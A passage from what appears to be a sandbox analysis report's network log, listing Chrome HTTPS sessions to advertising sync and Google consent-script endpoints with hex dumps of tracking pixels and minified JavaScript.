2024-10-31 18:19:40 UTC	534	OUT	GET /t/v2/sync?tagid=V2_4531&src.visitorid=CAESEF9fyWZJ8RKws_tJ1qGsPfA&google_push=AXcoOmR4H2VfDZB2KNV09WyzX4pnuC39urG3o7HFxj9XXoEoU4DPWDgCGNwoygQN3Mr9g8i_oN8U9qlhz3zZEvnu_wfoP_GQkTanpUQ&google_cver=1 HTTP/1.1 Host: odr.mookie1.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-10-31 18:19:41 UTC	298	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 31 Oct 2024 18:19:40 GMT Content-Type: image/gif Content-Length: 42 Last-Modified: Thu, 19 Oct 2023 06:07:48 GMT ETag: "6530c7b4-2a" Accept-Ranges: bytes Via: 1.1 google Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-10-31 18:19:41 UTC	42	IN	Data Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00 ff ff ff 21 f9 04 01 00 00 01 00 2c 00 00 00 00 01 00 01 00 00 02 01 4c 00 3b Data Ascii: GIF89a!,L;

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
77	192.168.2.4	50004	74.119.117.16	443	7284	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-31 18:19:40 UTC	665	OUT	GET /dis/usersync.aspx?r=4&p=14&cp=google&cu=1&url=https%3A%2F%2Fcm.g.doubleclick.net%2Fpixel%3Fgoogle_nid%3Dcjp%26google_hm%3D%40%40CRITEO_USERID%40%40%26google_push%3DAXcoOmQ1NvIkBuiezRP4VyO1tot_Yk-dOVvINUBM4mZHt7YSmwC9oik7a2vt6010qe8UdTECB7DIt_PBPnp2mLudoQCl_f0ZmP97TYXp&google_gid=CAESEBG-T-imfgN0jPbZ2bYvkgg&google_cver=1 HTTP/1.1 Host: widget.us.criteo.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-10-31 18:19:41 UTC	441	IN	HTTP/1.1 200 OK content-type: image/gif date: Thu, 31 Oct 2024 18:19:40 GMT server: Kestrel cache-control: no-cache expires: Thu, 31 Oct 2024 00:00:00 GMT pragma: no-cache transfer-encoding: chunked x-errorlevel: 0 p3p: CP="NON DSP COR CURa PSA PSD OUR BUS NAV STA" cross-origin-resource-policy: cross-origin server-processing-duration-in-ticks: 191079 strict-transport-security: max-age=31536000; preload; connection: close
2024-10-31 18:19:41 UTC	54	IN	Data Raw: 32 42 0d 0a 47 49 46 38 39 61 01 00 01 00 80 00 00 ff ff ff 00 00 00 21 f9 04 00 00 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 02 44 01 00 3b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2BGIF89a!,D;0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
78	192.168.2.4	49996	142.250.186.174	443	7284	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-31 18:19:40 UTC	524	OUT	GET /i/ca-pub-9495854422341365?href=https%3A%2F%2Ftrksyln.net%2FError&ers=2 HTTP/1.1 Host: fundingchoicesmessages.google.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-10-31 18:19:41 UTC	1936	IN	HTTP/1.1 200 OK Content-Type: application/javascript; charset=utf-8 Timing-Allow-Origin: * Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Thu, 31 Oct 2024 18:19:41 GMT Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy: script-src 'report-sample' 'nonce-ckFKApdnDaHHPuv3M9C-IQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/ContributorServingWebSwitchboardHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/ContributorServingWebSwitchboardHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/ContributorServingWebSwitchboardHttp/cspreport Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Opener-Policy: same-origin reporting-endpoints: default="/_/ContributorServingWebSwitchboardHttp/web-reports?context=eJzjytDikmLw1pBikPj6kkkNiJ3SZ7AGAHHrzXOsk4E46d951gIgdte6yOoPxIYKl1jtgdix6BKrJxCr9lxiNQbi--susT4H4iKJK6wNQHy76QrrYyBm-HqFlQOIhbg59k7p38kmsOHfc1sljaT8wvjk_LySosyk0pL8orTktNTi1KKy1KJ4IwMjE0MDYwM9A4P4AgMAP_g_pQ" Server: ESF X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-10-31 18:19:41 UTC	1936	IN	Data Raw: 36 65 64 65 0d 0a 69 66 20 28 74 79 70 65 6f 66 20 5f 5f 67 6f 6f 67 6c 65 66 63 20 3d 3d 3d 20 27 75 6e 64 65 66 69 6e 65 64 27 20 7c 7c 20 74 79 70 65 6f 66 20 5f 5f 67 6f 6f 67 6c 65 66 63 2e 66 63 4b 65 72 6e 65 6c 4d 61 6e 61 67 65 72 20 3d 3d 3d 20 27 75 6e 64 65 66 69 6e 65 64 27 29 20 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 74 68 69 73 2e 64 65 66 61 75 6c 74 5f 43 6f 6e 74 72 69 62 75 74 6f 72 53 65 72 76 69 6e 67 52 65 73 70 6f 6e 73 65 43 6c 69 65 6e 74 4a 73 3d 74 68 69 73 2e 64 65 66 61 75 6c 74 5f 43 6f 6e 74 72 69 62 75 74 6f 72 53 65 72 76 69 6e 67 52 65 73 70 6f 6e 73 65 43 6c 69 65 6e 74 4a 73 7c 7c 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 3d 74 68 69 73 3b 0a 74 72 79 7b 0a 5f 2e 5f 46 5f 74 6f 67 Data Ascii: 6edeif (typeof __googlefc === 'undefined' \|\| typeof __googlefc.fcKernelManager === 'undefined') {"use strict";this.default_ContributorServingResponseClientJs=this.default_ContributorServingResponseClientJs\|\|{};(function(_){var window=this;try{_._F_tog
2024-10-31 18:19:41 UTC	1936	IN	Data Raw: 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 66 61 28 62 61 28 74 68 69 73 29 29 7d 7d 29 7d 72 65 74 75 72 6e 20 61 7d 29 3b 66 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 3d 7b 6e 65 78 74 3a 61 7d 3b 61 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 7d 3b 72 65 74 75 72 6e 20 61 7d 3b 0a 5f 2e 71 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 26 26 61 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 3b 69 66 28 62 29 72 65 74 75 72 6e 20 62 2e 63 61 6c 6c 28 61 29 3b 69 66 28 74 79 70 65 6f 66 20 61 2e 6c 65 6e 67 74 68 3d 3d Data Ascii: e:function(){return fa(ba(this))}})}return a});fa=function(a){a={next:a};a[Symbol.iterator]=function(){return this};return a};_.q=function(a){var b=typeof Symbol!="undefined"&&Symbol.iterator&&a[Symbol.iterator];if(b)return b.call(a);if(typeof a.length==
2024-10-31 18:19:41 UTC	1936	IN	Data Raw: 66 28 67 20 69 6e 73 74 61 6e 63 65 6f 66 20 65 29 74 68 69 73 2e 68 61 28 67 29 3b 65 6c 73 65 7b 61 3a 73 77 69 74 63 68 28 74 79 70 65 6f 66 20 67 29 7b 63 61 73 65 20 22 6f 62 6a 65 63 74 22 3a 76 61 72 20 68 3d 67 21 3d 6e 75 6c 6c 3b 62 72 65 61 6b 20 61 3b 63 61 73 65 20 22 66 75 6e 63 74 69 6f 6e 22 3a 68 3d 21 30 3b 62 72 65 61 6b 20 61 3b 64 65 66 61 75 6c 74 3a 68 3d 21 31 7d 68 3f 74 68 69 73 2e 4b 28 67 29 3a 74 68 69 73 2e 41 28 67 29 7d 7d 3b 65 2e 70 72 6f 74 6f 74 79 70 65 2e 4b 3d 0a 66 75 6e 63 74 69 6f 6e 28 67 29 7b 76 61 72 20 68 3d 76 6f 69 64 20 30 3b 74 72 79 7b 68 3d 67 2e 74 68 65 6e 7d 63 61 74 63 68 28 6b 29 7b 74 68 69 73 2e 75 28 6b 29 3b 72 65 74 75 72 6e 7d 74 79 70 65 6f 66 20 68 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 3f 74 Data Ascii: f(g instanceof e)this.ha(g);else{a:switch(typeof g){case "object":var h=g!=null;break a;case "function":h=!0;break a;default:h=!1}h?this.K(g):this.A(g)}};e.prototype.K=function(g){var h=void 0;try{h=g.then}catch(k){this.u(k);return}typeof h=="function"?t
2024-10-31 18:19:41 UTC	1936	IN	Data Raw: 3d 5f 2e 71 28 67 29 2c 6b 3d 68 2e 6e 65 78 74 28 29 3b 72 65 74 75 72 6e 20 6b 2e 64 6f 6e 65 3f 63 28 5b 5d 29 3a 6e 65 77 20 65 28 66 75 6e 63 74 69 6f 6e 28 6d 2c 6e 29 7b 66 75 6e 63 74 69 6f 6e 20 77 28 78 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 44 29 7b 41 5b 78 5d 3d 44 3b 42 2d 2d 3b 42 3d 3d 30 26 26 6d 28 41 29 7d 7d 76 61 72 20 41 3d 5b 5d 2c 42 3d 30 3b 64 6f 20 41 2e 70 75 73 68 28 76 6f 69 64 20 30 29 2c 42 2b 2b 2c 63 28 6b 2e 76 61 6c 75 65 29 2e 6d 62 28 77 28 41 2e 6c 65 6e 67 74 68 2d 31 29 2c 6e 29 2c 6b 3d 68 2e 6e 65 78 74 28 29 3b 77 68 69 6c 65 28 21 6b 2e 64 6f 6e 65 29 7d 29 7d 3b 72 65 74 75 72 6e 20 65 7d 29 3b 0a 76 61 72 20 72 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 69 66 28 61 3d 3d 6e 75 6c 6c Data Ascii: =_.q(g),k=h.next();return k.done?c([]):new e(function(m,n){function w(x){return function(D){A[x]=D;B--;B==0&&m(A)}}var A=[],B=0;do A.push(void 0),B++,c(k.value).mb(w(A.length-1),n),k=h.next();while(!k.done)})};return e});var ra=function(a,b,c){if(a==null
2024-10-31 18:19:41 UTC	1936	IN	Data Raw: 3b 72 65 74 75 72 6e 20 68 7d 29 3b 0a 70 28 22 4d 61 70 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 21 61 7c 7c 74 79 70 65 6f 66 20 61 21 3d 22 66 75 6e 63 74 69 6f 6e 22 7c 7c 21 61 2e 70 72 6f 74 6f 74 79 70 65 2e 65 6e 74 72 69 65 73 7c 7c 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 73 65 61 6c 21 3d 22 66 75 6e 63 74 69 6f 6e 22 29 72 65 74 75 72 6e 21 31 3b 74 72 79 7b 76 61 72 20 68 3d 4f 62 6a 65 63 74 2e 73 65 61 6c 28 7b 78 3a 34 7d 29 2c 6b 3d 6e 65 77 20 61 28 5f 2e 71 28 5b 5b 68 2c 22 73 22 5d 5d 29 29 3b 69 66 28 6b 2e 67 65 74 28 68 29 21 3d 22 73 22 7c 7c 6b 2e 73 69 7a 65 21 3d 31 7c 7c 6b 2e 67 65 74 28 7b 78 3a 34 7d 29 7c 7c 6b 2e 73 65 74 28 7b 78 3a 34 7d 2c 22 74 22 29 21 3d 6b 7c 7c Data Ascii: ;return h});p("Map",function(a){if(function(){if(!a\|\|typeof a!="function"\|\|!a.prototype.entries\|\|typeof Object.seal!="function")return!1;try{var h=Object.seal({x:4}),k=new a(_.q([[h,"s"]]));if(k.get(h)!="s"\|\|k.size!=1\|\|k.get({x:4})\|\|k.set({x:4},"t")!=k\|\|
2024-10-31 18:19:41 UTC	1936	IN	Data Raw: 2c 6b 29 7b 76 61 72 20 6d 3d 68 5b 31 5d 3b 72 65 74 75 72 6e 20 66 61 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 6d 29 7b 66 6f 72 28 3b 6d 2e 68 65 61 64 21 3d 68 5b 31 5d 3b 29 6d 3d 6d 2e 71 61 3b 66 6f 72 28 3b 6d 2e 6e 65 78 74 21 3d 6d 2e 68 65 61 64 3b 29 72 65 74 75 72 6e 20 6d 3d 0a 6d 2e 6e 65 78 74 2c 7b 64 6f 6e 65 3a 21 31 2c 76 61 6c 75 65 3a 6b 28 6d 29 7d 3b 6d 3d 6e 75 6c 6c 7d 72 65 74 75 72 6e 7b 64 6f 6e 65 3a 21 30 2c 76 61 6c 75 65 3a 76 6f 69 64 20 30 7d 7d 29 7d 2c 66 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 68 3d 7b 7d 3b 72 65 74 75 72 6e 20 68 2e 71 61 3d 68 2e 6e 65 78 74 3d 68 2e 68 65 61 64 3d 68 7d 2c 67 3d 30 3b 72 65 74 75 72 6e 20 63 7d 29 3b 0a 70 28 22 53 65 74 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 Data Ascii: ,k){var m=h[1];return fa(function(){if(m){for(;m.head!=h[1];)m=m.qa;for(;m.next!=m.head;)return m=m.next,{done:!1,value:k(m)};m=null}return{done:!0,value:void 0}})},f=function(){var h={};return h.qa=h.next=h.head=h},g=0;return c});p("Set",function(a){if
2024-10-31 18:19:41 UTC	1936	IN	Data Raw: 65 78 4f 66 28 62 2c 63 7c 7c 30 29 21 3d 3d 2d 31 7d 7d 29 3b 0a 70 28 22 41 72 72 61 79 2e 66 72 6f 6d 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 61 3a 66 75 6e 63 74 69 6f 6e 28 62 2c 63 2c 64 29 7b 63 3d 63 21 3d 6e 75 6c 6c 3f 63 3a 66 75 6e 63 74 69 6f 6e 28 68 29 7b 72 65 74 75 72 6e 20 68 7d 3b 76 61 72 20 65 3d 5b 5d 2c 66 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 26 26 62 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 3b 69 66 28 74 79 70 65 6f 66 20 66 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 29 7b 62 3d 66 2e 63 61 6c 6c 28 62 29 3b 66 6f 72 28 76 61 72 20 67 3d 30 3b 21 28 66 3d 62 2e 6e 65 78 74 28 29 29 2e 64 6f 6e 65 3b 29 65 Data Ascii: exOf(b,c\|\|0)!==-1}});p("Array.from",function(a){return a?a:function(b,c,d){c=c!=null?c:function(h){return h};var e=[],f=typeof Symbol!="undefined"&&Symbol.iterator&&b[Symbol.iterator];if(typeof f=="function"){b=f.call(b);for(var g=0;!(f=b.next()).done;)e
2024-10-31 18:19:41 UTC	1936	IN	Data Raw: 3b 64 3d 4e 75 6d 62 65 72 28 64 29 3b 64 3c 30 26 26 28 64 3d 4d 61 74 68 2e 6d 61 78 28 30 2c 65 2b 64 29 29 3b 66 6f 72 28 63 3d 4e 75 6d 62 65 72 28 63 7c 7c 30 29 3b 63 3c 64 3b 63 2b 2b 29 74 68 69 73 5b 63 5d 3d 62 3b 72 65 74 75 72 6e 20 74 68 69 73 7d 7d 29 3b 76 61 72 20 74 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 61 3a 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 66 69 6c 6c 7d 3b 70 28 22 49 6e 74 38 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 66 69 6c 6c 22 2c 74 61 29 3b 70 28 22 55 69 6e 74 38 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 66 69 6c 6c 22 2c 74 61 29 3b 70 28 22 55 69 6e 74 38 43 6c 61 6d 70 65 64 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 66 69 6c 6c 22 2c 74 61 29 3b 70 28 22 49 6e Data Ascii: ;d=Number(d);d<0&&(d=Math.max(0,e+d));for(c=Number(c\|\|0);c<d;c++)this[c]=b;return this}});var ta=function(a){return a?a:Array.prototype.fill};p("Int8Array.prototype.fill",ta);p("Uint8Array.prototype.fill",ta);p("Uint8ClampedArray.prototype.fill",ta);p("In
2024-10-31 18:19:41 UTC	1936	IN	Data Raw: 21 3d 2d 31 7d 3b 45 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 5f 2e 41 61 3f 21 21 5f 2e 42 61 26 26 5f 2e 42 61 2e 62 72 61 6e 64 73 2e 6c 65 6e 67 74 68 3e 30 3a 21 31 7d 3b 0a 47 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 45 61 28 29 3f 43 61 28 22 43 68 72 6f 6d 69 75 6d 22 29 3a 28 5f 2e 44 61 28 22 43 68 72 6f 6d 65 22 29 7c 7c 5f 2e 44 61 28 22 43 72 69 4f 53 22 29 29 26 26 21 28 45 61 28 29 3f 30 3a 5f 2e 44 61 28 22 45 64 67 65 22 29 29 7c 7c 5f 2e 44 61 28 22 53 69 6c 6b 22 29 7d 3b 5f 2e 49 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 48 61 26 26 61 21 3d 6e 75 6c 6c 26 26 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 55 69 6e 74 38 41 72 72 61 79 7d 3b 4c 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 Data Ascii: !=-1};Ea=function(){return _.Aa?!!_.Ba&&_.Ba.brands.length>0:!1};Ga=function(){return Ea()?Ca("Chromium"):(_.Da("Chrome")\|\|_.Da("CriOS"))&&!(Ea()?0:_.Da("Edge"))\|\|_.Da("Silk")};_.Ia=function(a){return Ha&&a!=null&&a instanceof Uint8Array};La=function(){v
2024-10-31 18:19:41 UTC	1936	IN	Data Raw: 73 62 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 74 72 79 7b 72 65 74 75 72 6e 20 61 2e 74 6f 53 74 72 69 6e 67 28 29 2e 69 6e 64 65 78 4f 66 28 22 5b 6e 61 74 69 76 65 20 63 6f 64 65 5d 22 29 21 3d 3d 2d 31 3f 61 3a 6e 75 6c 6c 7d 63 61 74 63 68 28 62 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 7d 7d 3b 77 62 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 75 62 3d 3d 3d 76 6f 69 64 20 30 29 7b 76 61 72 20 62 3d 6e 65 77 20 76 62 28 5b 5d 2c 7b 7d 29 3b 75 62 3d 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 63 6f 6e 63 61 74 2e 63 61 6c 6c 28 5b 5d 2c 62 29 2e 6c 65 6e 67 74 68 3d 3d 3d 31 7d 75 62 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 3d 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 26 26 53 79 6d 62 6f 6c 2e 69 73 43 6f 6e 63 61 74 53 70 72 65 61 64 61 62 6c 65 Data Ascii: sb=function(a){try{return a.toString().indexOf("[native code]")!==-1?a:null}catch(b){return null}};wb=function(a){if(ub===void 0){var b=new vb([],{});ub=Array.prototype.concat.call([],b).length===1}ub&&typeof Symbol==="function"&&Symbol.isConcatSpreadable

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
79	192.168.2.4	49988	142.250.186.174	443	7284	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-31 18:19:40 UTC	912	OUT	GET /f/AGSKWxXE0rdt5cwklf9PRBqqi8rFncdilTmLVYbRCmgcYEIr_h6aXnlDVbYl8-Mw69k26WrMfK2ANMfR9tO7b_s5NhLr9ZNkM_vAqZxxWuutweCz4t4EvQ7RPeu7lVUr28c-H-5-bioZAg==?fccs=W251bGwsbnVsbCxudWxsLG51bGwsbnVsbCxudWxsLFsxNzMwMzk4NzcyLDU3NDAwMDAwMF0sbnVsbCxudWxsLG51bGwsW251bGwsWzcsNl0sbnVsbCxudWxsLG51bGwsbnVsbCxudWxsLG51bGwsbnVsbCxudWxsLG51bGwsMV0sImh0dHBzOi8vdHJrc3lsbi5uZXQvRXJyb3IiLG51bGwsW1s4LCJZc2dPT2N0dWtySSJdLFs5LCJlbi1VUyJdLFsxOSwiMiJdLFsxNywiWzBdIl0sWzE4LCJbW1sxXV1dIl1dXQ HTTP/1.1 Host: fundingchoicesmessages.google.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-10-31 18:19:41 UTC	1936	IN	HTTP/1.1 200 OK Content-Type: application/javascript; charset=utf-8 Timing-Allow-Origin: * Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Thu, 31 Oct 2024 18:19:41 GMT Content-Security-Policy: script-src 'report-sample' 'nonce-lVneTKiX8AqvF4CmvwH_VQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/ContributorServingWebSwitchboardHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/ContributorServingWebSwitchboardHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/ContributorServingWebSwitchboardHttp/cspreport Cross-Origin-Opener-Policy: same-origin Cross-Origin-Resource-Policy: cross-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version reporting-endpoints: default="/_/ContributorServingWebSwitchboardHttp/web-reports?context=eJzjytDikmJw1pBikPj6kkkNiJ3SZ7AGAHHrzXOsk4E46d951gIgdte6yOoPxIYKl1jtgdix6BKrJxCr9lxiNQbi--susT4H4iKJK6wNQHy76QrrYyBm-HqFlQOIhbg59k7p38kmcGPLf1cljaT8wvjk_LySosyk0pL8orTktNTi1KKy1KJ4IwMjE0MDYwM9A4P4AgMAOsY_mw" Server: ESF X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-10-31 18:19:41 UTC	1936	IN	Data Raw: 64 39 66 0d 0a 69 66 20 28 74 79 70 65 6f 66 20 5f 5f 67 6f 6f 67 6c 65 66 63 2e 66 63 4b 65 72 6e 65 6c 4d 61 6e 61 67 65 72 2e 72 75 6e 20 3d 3d 3d 20 27 66 75 6e 63 74 69 6f 6e 27 29 20 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 74 68 69 73 2e 64 65 66 61 75 6c 74 5f 43 6f 6e 74 72 69 62 75 74 6f 72 53 65 72 76 69 6e 67 52 65 73 70 6f 6e 73 65 43 6c 69 65 6e 74 4a 73 3d 74 68 69 73 2e 64 65 66 61 75 6c 74 5f 43 6f 6e 74 72 69 62 75 74 6f 72 53 65 72 76 69 6e 67 52 65 73 70 6f 6e 73 65 43 6c 69 65 6e 74 4a 73 7c 7c 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 3d 74 68 69 73 3b 0a 74 72 79 7b 0a 76 61 72 20 74 6e 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 29 7b 76 61 72 20 65 3d 6e 6e 28 63 29 2c 66 2c 67 2c 68 3d Data Ascii: d9fif (typeof __googlefc.fcKernelManager.run === 'function') {"use strict";this.default_ContributorServingResponseClientJs=this.default_ContributorServingResponseClientJs\|\|{};(function(_){var window=this;try{var tn=function(a,b,c,d){var e=nn(c),f,g,h=
2024-10-31 18:19:41 UTC	1558	IN	Data Raw: 31 29 3b 5f 2e 59 66 28 64 2c 32 2c 65 29 7d 5f 2e 7a 28 63 2c 5f 2e 61 67 2c 32 29 26 26 28 63 3d 5f 2e 45 28 63 2c 5f 2e 61 67 2c 32 29 2c 5f 2e 4e 28 64 2c 33 2c 63 29 29 3b 5f 2e 4e 28 62 2c 32 2c 64 29 3b 61 2e 52 28 32 2c 5f 2e 4a 28 62 29 29 7d 7d 7d 3b 76 61 72 20 41 6e 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 74 68 69 73 2e 6c 3d 5f 2e 74 28 61 29 7d 3b 5f 2e 76 28 41 6e 2c 5f 2e 49 29 3b 76 61 72 20 42 6e 3d 5b 32 2c 33 5d 3b 76 61 72 20 7a 6e 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 74 68 69 73 2e 6c 3d 5f 2e 74 28 61 29 7d 3b 5f 2e 76 28 7a 6e 2c 5f 2e 49 29 3b 76 61 72 20 43 6e 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 74 68 69 73 2e 6c 3d 5f 2e 74 28 61 29 7d 3b 5f 2e 76 28 43 6e 2c 5f 2e 49 29 3b 76 61 72 20 44 6e 3d 5f 2e 75 28 43 6e 29 3b 76 61 Data Ascii: 1);_.Yf(d,2,e)}_.z(c,_.ag,2)&&(c=_.E(c,_.ag,2),_.N(d,3,c));_.N(b,2,d);a.R(2,_.J(b))}}};var An=function(a){this.l=_.t(a)};_.v(An,_.I);var Bn=[2,3];var zn=function(a){this.l=_.t(a)};_.v(zn,_.I);var Cn=function(a){this.l=_.t(a)};_.v(Cn,_.I);var Dn=_.u(Cn);va
2024-10-31 18:19:41 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
80	192.168.2.4	49989	142.250.186.174	443	7284	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
